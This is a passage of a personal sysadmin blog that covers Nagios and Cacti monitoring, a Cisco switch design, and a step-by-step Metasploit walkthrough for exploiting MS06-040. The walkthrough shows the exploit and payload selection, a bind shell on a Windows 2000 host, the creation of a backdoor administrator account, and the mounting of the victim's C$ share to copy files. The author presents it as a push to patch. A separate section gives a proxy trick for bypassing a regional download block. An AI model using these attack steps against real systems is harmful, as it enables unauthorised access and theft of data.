	action_url              http://$HOSTADDRESS$/blog/wp-admin/
}

What this does is it adds my wordpress-w icon to the nagios status pages, and give me a “red star” type icon which when I click on takes me to my wordpress admin page… cool !

Some compulsory Screen-shots.

That should just about wrap it up, one fully monitored wordpress installation; as you can see this can be adapted to monitor any php / mysql app Please let me know if you have any further suggestions.

Cacti & Nagios – Missing Favicons

Recently I decided to re-organise my bookmarks toolbar, and added links to my nagios and cacti installations. I noticed that the favicons where missing.

For cacti, there’s a how to, but I found it a little over kill – I didn’t need step 2 , as my catci install is an rpm from dag, and I didn’t bother with step 4, as it worked without it, but hey ymmv!

Nagios was simpler, depending on how you installed nagios, will effect file permission , owners, directories etc. Again, I’ve got another dag rpm, so for me I logged in as root,

cd /usr/share/nagios/
wget http://www.nagios.org/images/favicon.ico

then edit index.html. just before </head> , insert

<link rel="shortcut icon" href="/nagios/favicon.ico" type="image/x-icon" />

refresh your browser (delete the cache if necessary), and job done !

Basic Example Cisco Switch Config

Layer 2 Overview

Figure 1

I’ve been meaning to add a dedicated cisco section to my site for a while, I thought it’d be helpful if I converged my rants with work a little I’m hoping to build up a personal archive of notes for work, and in doing so help other with similar roles & problems. I’ve gone through and added any cisco related posts to my archive , useful cisco bookmarks have always been online with del.icio.us , and now to finish off I have a config files directory. Usual rules apply to this an all other posts – see disclaimer.

Moving from a general security reseller to a “cisco cisco cisco” house has meant that templates have become important in my life; lets take security products like checkpoint or websense, not only are they gui driven (which makes templating difficult) but their implementation is very specific to their environment, as such companies that install with templates here usually aren’t doing a very good job. Switches or Routers on the other had can be templated, because there are only a few design scenarios (engineers usually stick to a favourite) and once you’re happy with a design, moving it from customer to customer usually only involves changing ip’s and passwords (of course a little intelligence to spot what else might need changing also helps).

This is a switch design my boss has handed down, it’s a basic collapsed core (i.e. no distribution layer) site campus implementation. I’m not going to take all the credit for the content as Frank helped a great deal (thanks mate).

Each access layer switch has two connections up to the core, and the core has an etherchannel link to provide the resilient triangle loop – See Figure 1. There a couple of things you need to pay attention two within this design…

1. The obvious one is that all the layer3 takes place in the core, now there is currently a cisco document circulating that we should be pushing the layer3 to the edge to take advantage of QoS for all things new like voice and video, I am aware of these considerations, but I haven’t found it entirely applicable*, which brings me to…
2. The design relies on having two VLANS on each access layer switch. Why ? Because is my experience cable and physical faults occur more often (human errors excluded of course) in cisco networks than switch failure, as such it’s good to have a design where by all cables have traffic flow. If traffic flows down all ports then MRTG can be used to view the usage, and if the “bloke that changes the light bulb” accidentally cuts through a fibre link you’re aware… this is much more preferable than having a standby link that’s never used/tested fail just as you need it. In short why two vlans, traffic for both routes. – See Figure 2. *why do I need QoS on my campus if I have two vlans, one dedicated for voice, and the other for data

Splitting the VLANS

Figure 2

Hopefully I’ve explained this well enough, if you take a look at the configs you’ll see that I’ve mirrored up the active HSRP SVI with the STP root bridge. This implementation ensures that I get the desired traffic flow, and distributed processing, i.e. if I force a route bridge on core b, why send it to core a for layer3 ? With all the technologies working correctly we have a completely resilient solution.

Mainly for my reference the example configs have some default security settings, these settings closely meet the safe blueprint but may need tuning, i.e. if you have a large campus you should be using TACACS+ rather than local user names and passwords…. it’s also important to note, if you don’t know what some of this does, you should probably google for it to find out The configs have been applied to cat4500/6k type devices in the core, and a stack of 4 3750′s at the edge (access layer). You should be aware that not all functionality is available on all switches , note I’m using vlan acls for rfc 2827 filtering, this probably isn’t available on lesser switches.

Anyway, enjoy !

How to Exploit MS06-040

It would have been irresponsible of me to write this any earlier, but a few days of past and hopefully the majority have installed the appropiate patch or at the very least are running personal/perimeter firewalls until they complete their change control.

Many may have seen e-mail alerts and news articles that say exploit in the wild and may not appreciate what this actually means. You hear people say “It’ll never happen to me” or “it’s only geeky Linux kids who can do this, my business isn’t at risk”; OK but do you know actually how easy it is ?

Myth Number 1: You need to be Linux literate to hack. It is true that many hacking tools are built for *nix, and many will say they are the best (heck I’m using Linux now, so I’m not going to argue!) but many tools have been ported to windows (or Mac if you prefer), and if you think your average help-desk junkie is fairly windows literate, how difficult is it to point & click ? – are you concerned yet ?

Myth Number 2: Hacking is hard. Proper hacking – finding exploits in code yes, but what the public means as hacking, like copying files off your PC, no. I’m going to show you how to use a windows PC to Hack a vulnerable server, create an administrator account which will allow you to copy the contents of the severs hard drive.

OK, so exploit in the wild means, a popular hacking website has published a working exploit, in the case of MS06-040 Milw0rm did, here. What made this exploit interesting is that it was published as part of the popular pen testing tool Metasploit, which yep you guessed it, runs on windows !

So to get started, download and install metasploit (I’ll be using Framework 2.6).

Once that’s installed you’ll need to update it with the latest available exploits, so click start -> metasploit framework -> msfupdate , and watch it do it’s thing. (for Linux or mac people you need to run msfupdate -u.) During the update you’ll see that it downloads netapi_ms06_040.pm, in windows world you have to be quick, as the window closes when it’s finished updating, but linuxy’s will be able to see, this is the exploit as published on Milw0rm.

Now there is a web GUI to metasploit framework, but (i) I didn’t find it that easy to use & (ii) it’s quite difficult to write an article saying point & click , so to hack (and I use the term loosely) we’re going to use the console, which is a little like a router console, limited commands not as overwhelming as a full command shell/terminal. So windows users start -> metspolit framework -> msfconsole (mac & Linux, just type msfconsole), and you’ll get a black box that looks a little like this:


                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888

+ -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]

 msf >

So to get started, you can just type help to see a list of commands:

msf > help

Metasploit Framework Main Console Help
======================================

        ?            Show the main console help
        cd           Change working directory
        exit         Exit the console
        help         Show the main console help
        info         Display detailed exploit or payload information
        quit         Exit the console
        reload       Reload exploits and payloads
        save         Save configuration to disk
        setg         Set a global environment variable
        show         Show available exploits and payloads
        unsetg       Remove a global environment variable
        use          Select an exploit by name
        version      Show console version

show exploits will give a list of available exploits, and we want netapi_ms06_040, so type use netapi_ms06_040, notice how the prompt has changed :

msf> use netapi_ms06_040
msf netapi_ms06_040 >

Right the next thing you need is something to attack, now I’ve got a windows 2000 server sp4 waiting with an ip address of 192.168.10.121, so to tell metasploit what to attack, you need to set a remote host variable. For the unfamiliar a variable is a word that represents something (I’m not a programmer so sorry for the crap definition), so we’re gonna set the word RHOSTto 192.168.10.121:

msf netapi_ms06_040 >set RHOST 192.168.10.120
RHOST -> 192.168.10.120
msf netapi_ms06_040 >

The final thing to do is to set up a payload. A payload is what you want to happen after you’ve exploited, show payloads :

msf netapi_ms06_040 > show payloads

Metasploit Framework Usable Payloads
====================================

  win32_adduser                  Windows Execute net user /ADD
  win32_bind                     Windows Bind Shell
  win32_bind_dllinject           Windows Bind DLL Inject
  win32_bind_meterpreter         Windows Bind Meterpreter DLL Inject
  win32_bind_stg                 Windows Staged Bind Shell
  win32_bind_stg_upexec          Windows Staged Bind Upload/Execute
  win32_bind_vncinject           Windows Bind VNC Server DLL Inject
  win32_downloadexec             Windows Executable Download and Execute
  win32_exec                     Windows Execute Command
  win32_reverse                  Windows Reverse Shell
  win32_reverse_dllinject        Windows Reverse DLL Inject
  win32_reverse_meterpreter      Windows Reverse Meterpreter DLL Inject
  win32_reverse_ord              Windows Staged Reverse Ordinal Shell
  win32_reverse_ord_vncinject    Windows Reverse Ordinal VNC Server Inject
  win32_reverse_stg              Windows Staged Reverse Shell
  win32_reverse_stg_upexec       Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject        Windows Reverse VNC Server Inject

Gives a nice list of what’s available, anything from command shells to full vnc guis. I’m going to pick the simplest which is win32_bind, when successful, this will change our metasploit console into a command prompt (start -> run -cmd.exe) on the attacked machine, thus allowing us to run any commands we like !

 msf netapi_ms06_040 >set PAYLOAD win32_bind
PAYLOAD -> win32_bind
 msf netapi_ms06_040(win32_bind) >

Before we go any further it’s best to check we’ve got everything; the show options command is massively useful because it show us what settings (or variables) we need before an exploit will work.

msf netapi_ms06_040(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name       Default           Description
  --------    -------    --------------    ---------------------------------------
  required    RHOST      192.168.10.121    The target address
  optional    SMBDOM                       The domain for specified SMB username
  optional    SMBUSER                      The SMB username to connect with
  optional    SMBPASS                      The password for specified SMB username

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

 msf netapi_ms06_040(win32_bind) >

As you can see we set the required RHOST, the others are optional (so we’ll ignore them) and the other required have been sorted for us

So the final touch is to hack ! Type exploit

msf netapi_ms06_040(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.10.119:45064 <-> 192.168.10.121:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Success ! (pat your self on the back!) you now have a working command line, now if you’re not that literate with windows command line you may think, so what !?!?! Well take a look at the following, we’ll set up a user called h4x0r, with password P455w0rd, and add him/her to the administrators group:

C:\WINNT\system32>net user h4x0r P455w0rd /add
net user h4x0r P455w0rd /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators h4x0r /add
net localgroup administrators h4x0r /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
h4x0r
The command completed successfully.

C:\WINNT\system32>

Now we have an administrator on that machine we can pretty much do what we like, so you windows users can mount the “C” drive as a remote hard drive and copy & read any file you like. So from your pc where metasploit is installed click start -> run , type cmd.exe; notice how the shell looks the same as the metasploit one ? and type

net use x: \\192.168.10.121\c$ P455w0rd /user:h4x0r

Finally windows people, under the “My Computer” of your machine you have an “X” drive of the server you attacked ! (Linux users you’ll have to use Samba to do the same, sorry Mac’ers I don’t know for you!)

In Summary
Yes this is a little long winded, but if you’ve read it you’ll see actually how easy it was, download a hacker program, install, type a couple of commands, and copy your victims files; now do you think this is beyond anyone on your IT departments help-desk ? do you really think they should be copying files off of the CEO’s laptop ?

It’s is my hope that, with all the news hype, and articles like this people will follow basic security practices, at home as well as at work, and thus making a better Internet for us all !

How to Get Google Browser Sync outside the USA

Some people may have noticed that you can’t install Google Browser Sync for Firefox if you live outside of the USA. If you try and download the xpi package directly you get this page This product is not available in your country

Well I’ve got a neat trick, try this link instead: http://anon.free.anonymizer.com/http://toolbar.google.com/firefox/extensions/toolbar/google-browsersync.xpi

Cacti. How to Enable SNMP v3 Polling.

Cacti SNMP v3 How-To (0.2)

Preface:

This document is intended to describe the process required to enable encrypted snmp polling within cacti. The document was written whilst performing the installation on a Linux Fedora Core 3 server, although implemntations on Fedora Core 1 & White Box Enterprise Linux have also been sucesful. The host used to gather data from for the purpose of this document is a Nokia IPSO appliance.

Limitations:

The version of cacti used will be 0.8.6b, “TheWitness” has told me that this version has a pooler crash, but I’ve yet to try upgrading to 8.8.6c.

System Requirements:

Apache, php, mysql, snmp, rrd-tool, and cacti

Installation:

I’m going to assume that you’ve got to the point where all of the parts needed for system requirements are working, cacti is installed, and you’ve just logged in after step 8 of http://www.cacti.net/downloads/docs/html/install_unix.html and was going to create a device.

Log out
Before we can create any snmp v3, we need to enable it; to enable snmp we need to make some changes to the php files.
Change: ~/cacti_install_dir/lib/snmp.php.txt
Line 46:
- Change: $version = “1″;
- to: $version = “3″;
Line 65:
- Change: $snmp_auth = “-u $username -X $password”; /* v3 – username/password */
- to: $snmp_auth = “-u $username -A $password”; /* v3 – username/password */
Line 119:
- Change: $snmp_auth = “-u $username -X $password”; /* v3 – username/password */
- to: $snmp_auth = “-u $username -A $password”; /* v3 – username/password */
Change: ~/cacti_install_dir/include/config_form.php.txt
Line 655:
- Change: “method” => “hidden”
- to: “method” => “textbox”
Line 663:
- Change: “method” => “hidden”
- to: “method” => “textbox”
Change: config_settings.php.txt
Uncomment Line 186 -> 199, i.e. remove the “//” from the begining of each line.
Change: config_array.php.txt
Line 135:
- Change:
  $snmp_versions = array(1 =>
  “Version 1″ ,
  “Version 2″ );
- To:
  $snmp_versions = array(1 =>
  “Version 1″,
  “Version 2″,
  “Version 3″);
Create /etc/snmp/snmp.conf
The contents of the file should be:

defContext “”
defSecurityLevel authNoPriv
Create Device
As documented. http://www.cacti.net/downloads/docs/html/graph_howto.html#NEW_DEVICE
(For Nokia IPSO Appliences use host Templaye Generic SNMP-enabled
HOST, and Associated Data Queries: SNMP – Get Processor Infomation & SNMP -
Interface Statistics )
Create Graph
As Documented. http://www.cacti.net/downloads/docs/html/graph_howto.html

Appendix:

Rpms on my FC3 Machine

$SHELL>rpm -qa | grep mysql
mysql-3.23.58-14
php-mysql-4.3.10-3.2
mysql-server-3.23.58-14
mysql-devel-3.23.58-14
libdbi-dbd-mysql-0.6.5-9

$SHELL> rpm -qa | grep php
php-ldap-4.3.10-3.2
php-mysql-4.3.10-3.2
php-odbc-4.3.10-3.2
php-4.3.10-3.2
php-pear-4.3.10-3.2

$SHELL> rpm -qa | grep http
httpd-suexec-2.0.52-3.1
system-config-httpd-1.3.1-1
httpd-2.0.52-3.1
httpd-manual-2.0.52-3.1

$SHELL> rpm -qa | grep rrd
rrdtool-1.0.49-3

$SHELL> rpm -qa | grep snmp
net-snmp-libs-5.1.2-11
net-snmp-5.1.2-11
net-snmp-utils-5.1.2-11

How to setup snmp v3 on IPSO
(The is a quick guide of the steps needed)
1. Log into Voyager
2. Click Config
3. Below the heading “Security and Access Configuration” Click Users
4. Add a new user (Username , uid {eg. 110}, home {eg /var/uid}), Click Apply
5. Set new users password , click apply
6. CLick Home, config, snmp
7. at the bottom of page set user to read-write
to test from cacti server, try from shell, snmpwalk -u user -A password ,
you should get….

$SHELL>snmpwalk -u user -A password default_gw
SNMPv2-MIB::sysDescr.0 = STRING: IP650 rev AAA06449-411, IPSO xxx 3.7.1-BUILD004 releng 1227 11.06.2003-010000 i386
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.94.1.21.2.1.8
SNMPv2-MIB::sysUpTime.0 = Timeticks: (382157315) 44 days, 5:32:53.15
SNMPv2-MIB::sysContact.0 = STRING: Me
SNMPv2-MIB::sysName.0 = STRING: Nokia
SNMPv2-MIB::sysLocation.0 = STRING: Here
SNMPv2-MIB::sysServices.0 = INTEGER: 76
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (16) 0:00:00.16
SNMPv2-MIB::sysORID.1 = OID: SNMPv2-MIB::snmpMIB

SNMPv2-MIB::sysORID.2 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
…….
ChangeLog
1. 16/3/2005 : [NICK] Doc Complete
2. 17/3/2005 : [NICK] Doc Published on http://forums.cacti.net/
3. 30/3/2005: [NICK] Doc moved into WordPress to allow viewers to comment directly
END

And I think that’s all folks, I hope it works for you & that you find this of some use !.